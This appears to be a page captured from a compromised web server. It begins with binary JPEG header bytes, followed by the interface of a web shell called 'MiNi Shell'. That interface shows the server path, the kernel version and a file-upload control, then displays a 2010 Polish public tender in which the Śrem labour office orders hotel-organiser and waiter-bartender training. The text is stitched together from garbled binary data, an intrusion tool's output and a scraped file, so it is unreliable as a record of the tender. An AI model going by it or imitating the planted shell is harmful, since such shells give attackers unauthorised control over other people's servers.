JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100715/188609-N-2010.html

<p class="kh_header"><b>Śrem: zorganizowanie i przeprowadzenie szkoleń: A. Organizator usług hotelarskich oraz B. Kelner - barman</b><br>
<b>Numer ogłoszenia: 188609 - 2010; data zamieszczenia: 15.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Śremie , ul. Adama Mickiewicza 56, 63-100 Śrem, woj. wielkopolskie, tel. 0-61 2837059, faks 0-61 2837075 w. 40.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.srem.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zorganizowanie i przeprowadzenie szkoleń: A. Organizator usług hotelarskich oraz B. Kelner - barman.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Organizator usług hotelarskich - dla 15 osób, posiadających wykształcenie minimum średnie. Termin wykonania zamówienia: III dekada lipca/II dekada września 2010r.
Celem szkolenia jest zdobycie niezbędnej wiedzy teoretycznej i praktycznej, a także umiejętności w zakresie kompleksowej organizacji usług hotelarskich z uwzględnieniem nauki komunikatywnego języka angielskiego. 
W zakresie tematycznym szkolenia muszą znaleźć się takie elementy jak: 
1. Podstawowe pojęcia związane z hotelarstwem (hotelarstwo, usługi hotelarskie, rodzaje obiektów hotelarskich).
2. Kultura i etyka w hotelarstwie (kodeks etyki hotelarza, wizerunek pracownika hotelu, kultura obsługi gości, konflikty i ich rozwiązywanie - praca z trudnym klientem).
3. Działalność recepcji. Rezerwacja usług hotelarskich (przyjmowanie rezerwacji, korespondencja rezerwacyjna, overbooking; procedury zameldowania i wymeldowania gości hotelowych). Kompleksowa obsługa gości. Dokumentacja recepcji, znajomość oprogramowania do wystawiania faktur, obsługa terminali płatniczych i kart płatniczych, obsługa kasy fiskalnej. Współpraca recepcji z innymi komórkami organizacyjnymi hotelu.
4. Opieka nad stałymi gośćmi: CRM - Customer Relationship Management (zarządzanie relacjami z klientami), programy lojalnościowe.
5. Czystość i porządek w obiekcie hotelarskim (obowiązki pracowników związane 
z utrzymaniem czystości i porządku, odpowiedzialność materialna pracowników).
6. Usługi gastronomiczne w obiekcie hotelarskim (rodzaje usług gastronomicznych w obiektach hotelarskich - room service i lounge service, caterning).
7. Język angielski.

Zgodnie z programem kursu na jednego uczestnika będzie przypadać około 
249 godzin lekcyjnych szkolenia (1 godzina lekcyjna = 45 min.), w tym około 78 godzin zajęć teoretycznych i około 171 godzin zajęć praktycznych. Szkolenie ma odbywać się w dni robocze (od poniedziałku do piątku) w godzinach od 8:00 do max 16:00. Liczba godzin szkolenia w ciągu tygodnia nie może być mniejsza niż 30 godzin zegarowych (1 godzina zegarowa = 60 min.).  Wyżej wymieniony czas trwania szkolenia będzie uwzględniać przerwy w szkoleniu. 
Wykonawca zapewni uczestnikom szkolenia poczęstunek:
- w trakcie szkolenia napoje zimne tj. woda, soki,
- w trakcie przerw: kawę, herbatę, cukier, mleko,  ciastka i kanapki. 
Szkolenie powinno odbywać się na terenie Śremu. W przypadku, gdyby szkolenie odbywało się poza Śremem, Wykonawca zapewni dojazd uczestników do miejsca szkolenia oraz z powrotem do Śremu. 

Kurs powinien być prowadzony przez wykwalifikowaną kadrę dydaktyczną. Kurs powinien być oparty o metody wykorzystujące zastosowanie ćwiczeń, przykładów praktycznych w celu aktywnego uczestnictwa osób szkolonych i prowadzenia oceny procesu zdobywania wiedzy w trakcie szkolenia. 
Wykonawca zapewni uczestnikom szkolenia odpowiednie warunki lokalowe do nauki 
w oparciu o zasady BHP: 
- W części teoretycznej zajęć - salę dydaktyczną wyposażoną stosownie do potrzeb 15 osobowej grupy słuchaczy: ławki, stoliki, tablice. 
- W części praktycznej nauki zawodu, która odbywać się będzie w hotelach, hotelikach pensjonatach, gdzie uczestnicy zapoznają się z różnymi systemami rezerwacji pokoi, w tym rezerwacji elektronicznej i obsługą gości; będą mieć dostęp do oprogramowania do obsługi gości, a także do oprogramowania stosowanego wewnątrz obiektu. Uczestnicy będą mieli do dyspozycji: minimum 5 komputerów i minimum 2 kasy fiskalne w celu zapewnienia odpowiedniej realizacji procesu nauczania praktycznego.
W przypadku skierowania przez Zamawiającego na szkolenie osób zarejestrowanych jako poszukujące pracy, Wykonawca zobowiązany będzie ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków powstałych w drodze do i z miejsca szkolenia. Okres ubezpieczenia obejmie cały okres trwania szkolenia. Wykonawca dokona ubezpieczenia kursantów na podstawie imiennej listy sporządzonej przez Zamawiającego. Wykonawca przedstawi Zamawiającemu kopię polisy ubezpieczeniowej najpóźniej w dniu rozpoczęcia zajęć.

W celu dokonania przez Zamawiającego oceny szkolenia, Wykonawca będzie prowadzić dokumentację przebiegu szkolenia:
- dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych (listę obecności uczestnicy muszą podpisywać w każdym dniu zajęć),
- rejestr wydanych zaświadczeń i/lub dyplomów.

Wykonawca zobowiązany będzie do przeprowadzenia wśród uczestników zajęć oceny merytorycznej i technicznej przebiegu szkolenia. W tym celu na zakończenie kursu uczestnicy wypełnią ankietę służącą do oceny szkolenia. Wyniki ankiety oceniającej Wykonawca przedstawi Zamawiającemu.
Po zakończeniu szkolenia uczestnicy otrzymają stosowne zaświadczenie i/lub dyplomy o jego ukończeniu. 

 B. Kelner - barman - dla 20 osób, posiadających wykształcenie minimum zasadnicze zawodowe. Termin wykonania zamówienia: I dekada sierpnia/III dekada sierpnia 2010r.

Celem szkolenia jest zdobycie kompleksowej wiedzy teoretycznej i praktycznej niezbędnej do wykonywania zawodu kelner-barman (z uwzględnieniem posługiwania się urządzeniami fiskalnymi używanymi w gastronomii).

W zakresie tematycznym szkolenia muszą znaleźć się takie elementy jak: 
1. Wygląd i prezencja Kelnera-Barmana: cechy osobowe dobrego kelnera/barmana, kultura obsługi gości przy stole z elementami wiedzy psychologicznej, sprzedaż sugestywna, napiwki - nagroda za dobrze wykonaną pracę kelnera/ barmana.
2. Karty menu: waga znajomości karty menu i karty win przez kelnerów, podawanie kart menu, doradzanie przy wyborze potraw.
3. Przygotowanie Sali konsumenckiej do obsługi gości: przygotowanie zastawy stołowej do podawania dań i napojów, przygotowanie pomocnika kelnerskiego.
4. Techniki nakrywania stołów bielizną stołową: metoda składania obrusów, techniki rozkładania obrusów, technika zdejmowania obrusa, zmiana obrusa w obecności gości.
5. Dekoracja stołu: zasady dekorowania stołu, elementy dekoracyjne, dekoracyjne składanie serwet płóciennych.
6. Nakrywanie stołów: nakrycie proste, nakrycie rozszerzone, przygotowanie nakrycia w obecności gości.
7. Przenoszenie tac i zastawy stołowej: przenoszenie talerzy, przenoszenie bulionówek, przenoszenie szkła i filiżanek, przenoszenie sztućców, przenoszenie półmisków.
8. Zbieranie zastawy stołowej po konsumpcji: zbieranie talerzy po konsumpcji, zbieranie zastawy stołowej na tacę.
9. Przebieg obsługi gości: powitanie i zajmowanie miejsc przez gości, przyjmowanie zamówienia, serwowanie potraw i napojów, rozmowa z gośćmi, realizacja rachunku, pożegnanie gości.
10. Ogólne zasady obsługi: kolejność podawania potraw i napojów, kolejność obsługi, skargi i reklamacje, postępowanie z trudnym konsumentem.
11 Towaroznawstwo alkoholowe i miksologia: podział alkoholi, kategorie drinków, najnowsze trendy w miksologii, drinki firmowe.
12. Podawanie napojów bezalkoholowych: podawanie gorących napojów bezalkoholowych, podawanie zimnych napojów bezalkoholowych.
13. Podawanie napojów alkoholowych: podawanie piwa, podawanie wódek, dobór alkoholi do potraw.
14. Enologia i sommelierstwo: charakterystyka i podział win, kraje winiarskie, techniki podawania wina, podawanie win czerwonych, podawanie win białych, podawanie win musujących, dobór win do potraw.
15. Organizacja obsługi przyjęć okolicznościowych: przygotowanie sali, nakrywanie i dekoracja stołów, techniki obsługi gości.
16. Systemy rozliczeń: bonowanie za pomocą kasy fiskalnej włączonej w komputerowy system rozliczeń, sposoby rozliczania z konsumentami - wystawianie rachunków i faktur w tym obsługa terminali płatniczych
17. Podstawy języka angielskiego związane ze specyfiką zawodu.
      	
Zgodnie z programem kursu na jednego uczestnika będzie przypadać około 
150 godzin lekcyjnych (1 godzina lekcyjna = 45 min.) szkolenia, w tym nie więcej niż 30 godzin zajęć teoretycznych i około 120 godzin zajęć praktycznych. 
Szkolenie ma odbywać się w dni:
- część teoretyczna w dni robocze (od poniedziałku do piątku) w godzinach od 8:00 do max 16:00.
- część praktyczna od poniedziałku do soboty z zachowaniem 5 dni szkolenia w tygodniu w godzinach od 8:00 do 24:00, z tym że nie więcej niż 8 godzin zegarowych.  
Liczba godzin szkolenia w ciągu jednego tygodnia nie może być mniejsza niż 30 godzin zegarowych (1 godzina zegarowa = 60 min.). Wyżej wymieniony czas trwania szkolenia będzie uwzględniać przerwy w szkoleniu. 
Wykonawca zapewni uczestnikom szkolenia poczęstunek:
- w trakcie szkolenia napoje zimne tj. woda, soki,
- w trakcie przerw: kawę, herbatę, cukier, mleko,  ciastka i kanapki.
 
Szkolenie powinno odbywać się na terenie Śremu. W przypadku, gdyby szkolenie odbywało się poza Śremem, Wykonawca zapewni dojazd uczestników do miejsca szkolenia oraz z powrotem do Śremu. 

Wykonawca zapewni wykwalifikowaną kadrę praktyków w zawodzie kelner-barman, posiadających co najmniej 5-letnie doświadczenie w zawodzie.
Kurs powinien być oparty o metody wykorzystujące zastosowanie ćwiczeń, przykładów praktycznych w celu aktywnego uczestnictwa osób szkolonych i prowadzenia oceny procesu zdobywania wiedzy w trakcie szkolenia. 
Wykonawca zapewni uczestnikom szkolenia odpowiednie warunki lokalowe do nauki 
w oparciu o zasady BHP, tj: 
-  stanowisko do samodzielnej nauki wiadomości teoretycznych - salę dydaktyczną wyposażoną stosownie do potrzeb 20 osobowej grupy słuchaczy: ławki, stoliki, tablice,
- stanowiska do wykonywania ćwiczeń praktycznych w punktach gastronomicznych lub też zaimprowizowanych barach i salach konsumpcyjnych, wyposażonych odpowiednio w materiały, urządzenia i sprzęt niezbędny do realizacji procesu nauczania, który zostanie udostępniony uczestnikom. Wykonawca zapewni minimum 1 komputer  i minimum 1 kasę fiskalną. Ponadto do praktycznej nauki zawodu uczestnicy szkolenia będą mieli do dyspozycji: 
a) w przypadku nauki zawodu Barman - bar z zapleczem kuchennym wyposażony 
w minimum 1 sztukę z każdego, wymienionego niżej sprzętu technicznego i barmańskiego.
Sprzęt techniczny: kostkarka do lodu, młynek do lodu (kruszarka), wyciskacz cytrusów, blender elektryczny 3 biegowy, ekspres do kawy ciśnieniowy plus młynek, knoc-box, tamper, pędzel do czyszczenia filtra, czasomierz, podajnik na tap water, chłodziarkę z zamrażalnikiem, zamrażarka do szkła, dozownik do napojów, zlew z zimną i ciepłą wodą, zmywarka automatyczna do mycia szkła (na zapleczu baru).
Sprzęt barmański: komplet miar barowych (25/50, 20/40), deska do krojenia z rynienką, korkociąg kelnerski, kosz na owoce, łyżka barowa, łyżka do lodu ażurowa, nóż do owoców ząbkowy z dwuzębną końcówką, ozdobne wiaderka do serwowania lodu, platerowa taca do serwowania napojów, pojemnik do lodu - termos, shaker klasyczny trzyczęściowy o poj. 0,75l, wiaderko do chłodzenia win z nogą, zamknięcia (stopery) do butelek z winem musującym,
b) w przypadku nauki zawodu Kelner: obiekt gastronomiczny lub zaimprowizowana sala konsumpcyjna musi być wyposażona w co najmniej 10 stolików konsumenckich oraz odpowiednią ilość zastawy i bielizny stołowej w celu realizacji programu nauczania. 

W przypadku skierowania przez Zamawiającego na szkolenie osób zarejestrowanych jako poszukujące pracy, Wykonawca zobowiązany będzie ubezpieczyć uczestników szkolenia od następstw nieszczęśliwych wypadków powstałych w drodze do i z miejsca szkolenia. Okres ubezpieczenia obejmie cały okres trwania szkolenia. Wykonawca dokona ubezpieczenia kursantów na podstawie imiennej listy sporządzonej przez Zamawiającego. Wykonawca przedstawi Zamawiającemu kopię polisy ubezpieczeniowej najpóźniej w dniu rozpoczęcia zajęć.

W celu dokonania przez Zamawiającego oceny szkolenia, Wykonawca będzie prowadzić dokumentację przebiegu szkolenia:
- dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych (listę obecności uczestnicy muszą podpisywać w każdym dniu zajęć),
- rejestr wydanych zaświadczeń i/lub dyplomów.

Wykonawca zobowiązany będzie do przeprowadzenia wśród uczestników zajęć oceny merytorycznej i technicznej przebiegu szkolenia. W tym celu na zakończenie kursu uczestnicy wypełnią ankietę służącą do oceny szkolenia. Wyniki ankiety oceniającej Wykonawca przedstawi Zamawiającemu.
Po zakończeniu szkolenia uczestnicy otrzymają stosowne zaświadczenie i/lub dyplomy o jego ukończeniu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest przedłożyć kopię zaświadczenia o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych prowadzonego przez właściwy ze względu na siedzibę Wykonawcy wojewódzki urząd pracy. Zamawiający dokonana weryfikacji wpisu do rejestru instytucji szkoleniowych pod kątem jego aktualności w elektronicznej bazie danych prowadzonej przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej. Warunek zostanie uznany za spełniony, jeżeli instytucja szkoleniowa będzie posiadała w rejestrze instytucji szkoleniowych status aktywna na 2010 rok.
Ocena spełnienia ww. warunku dokonana będzie przez Zamawiającego zgodnie z formułą spełnia - nie spełnia na podstawie dostarczonych oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert tj. od 23.07.2007r do 22.07.2010r., a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie, należycie wykonał co najmniej 3 szkolenia z zakresu objętego przedmiotem niniejszego zamówienia. 
Ocena spełnienia ww. warunku dokonana będzie przez Zamawiającego zgodnie z formułą spełnia - nie spełnia na podstawie dostarczonych oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że na czas realizacji zamówienia będzie dysponował: potencjałem technicznym adekwatnym do przedmiotu zamówienia umożliwiającym prawidłową realizację szkoleń, tj: 
1) pomieszczeniami do przeprowadzenia zajęć teoretycznych, których liczba i pojemność jest adekwatna do wielkości grup szkoleniowych,
2) w celu realizacji szkolenia określonego w punkcie A przedmiotu zamówienia będzie dysponował: 5 komputerami, 2 kasami fiskalnymi oraz zagwarantuje, że część praktyczna zajęć będzie się odbywać w hotelach, hotelikach, pensjonatach, gdzie uczestnicy zapoznają się z różnymi systemami rezerwacji pokoi, w tym rezerwacji elektronicznej i obsługą gości; będą mieć dostęp do oprogramowania do obsługi gości, a także do oprogramowania stosowanego wewnątrz obiektu.
3) w celu realizacji szkolenia określonego w punkcie B przedmiotu zamówienia będzie dysponował: minimum 1 komputerem i minimum 1 kasą fiskalną oraz zagwarantuje stanowiska do wykonywania ćwiczeń praktycznych w punktach gastronomicznych lub też zaimprowizowanych barach i salach konsumpcyjnych, wyposażonych odpowiednio w materiały, urządzenia i sprzęt niezbędny do realizacji procesu nauczania, który zostanie udostępniony uczestnikom. Ponadto do praktycznej nauki zawodu uczestnicy szkolenia będą mieli do dyspozycji: 
a) w przypadku nauki zawodu Barman - bar z zapleczem kuchennym wyposażony 
w minimum 1 sztukę z każdego, wymienionego niżej sprzętu technicznego i barmańskiego.
Sprzęt techniczny: kostkarka do lodu, młynek do lodu (kruszarka), wyciskacz cytrusów, blender elektryczny 3 biegowy, ekspres do kawy ciśnieniowy plus młynek, knoc-box, tamper, pędzel do czyszczenia filtra, czasomierz, podajnik na tap water, chłodziarkę z zamrażalnikiem, zamrażarka do szkła, dozownik do napojów, zlew z zimną i ciepłą wodą, zmywarka automatyczna do mycia szkła (na zapleczu baru).
Sprzęt barmański: komplet miar barowych (25/50, 20/40), deska do krojenia z rynienką, korkociąg kelnerski, kosz na owoce, łyżka barowa, łyżka do lodu ażurowa, nóż do owoców ząbkowy z dwuzębną końcówką, ozdobne wiaderka do serwowania lodu, platerowa taca do serwowania napojów, pojemnik do lodu - termos, shaker klasyczny trzyczęściowy o poj. 0,75l, wiaderko do chłodzenia win z nogą, zamknięcia (stopery) do butelek z winem musującym.
b) w przypadku nauki zawodu Kelner: obiekt gastronomiczny lub zaimprowizowana sala konsumpcyjna musi być wyposażona w co najmniej 10 stolików konsumenckich oraz odpowiednią ilość zastawy i bielizny stołowej w celu realizacji programu nauczania. 

Ocena spełnienia ww. warunku dokonana będzie przez Zamawiającego zgodnie z formułą spełnia - nie spełnia na podstawie dostarczonych oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że na czas realizacji zamówienia będzie dysponował osobami o odpowiednich kwalifikacjach umożliwiających realizację zamówienia, w tym:
1) posiadających doświadczenie zawodowe w postaci przeprowadzonych minimum 3 szkoleń grupowych w ciągu 2009 roku z zakresu tematyki szkolenia określonego w punkcie A przedmiotu zamówienia,
2) posiadających co najmniej 5-letnie doświadczenie w zawodzie kelner-barman oraz doświadczenie w postaci przeprowadzonych minimum 3 szkoleń grupowych w ciągu 2009 roku z zakresu tematyki szkolenia określonego w punkcie B przedmiotu zamówienia.

Ocena spełnienia ww. warunku dokonana będzie przez Zamawiającego zgodnie z formułą spełnia - nie spełnia na podstawie dostarczonych oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia zostanie spełniony, jeżeli Wykonawca:
1) osiągnął w 2009 roku obrót w wysokości co najmniej 2.500.000,00.zł (jeżeli okres działalności jest krótszy to minimalna wysokość obrotu powinna być proporcjonalna do okresu prowadzenia działalności). Przez obrót należy rozumieć obrót w rozumieniu ustawy z dnia 11 marca 2004r. o podatku od towarów i usług (Dz. U. z 2004r. nr 54, poz. 535 z późn. zm.).
2) posiada opłaconą  polisę, a w przypadku jej braku inny dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na czas realizacji przedmiotowego zamówienia na kwotę co najmniej 100.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 1 rok obrotowy</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

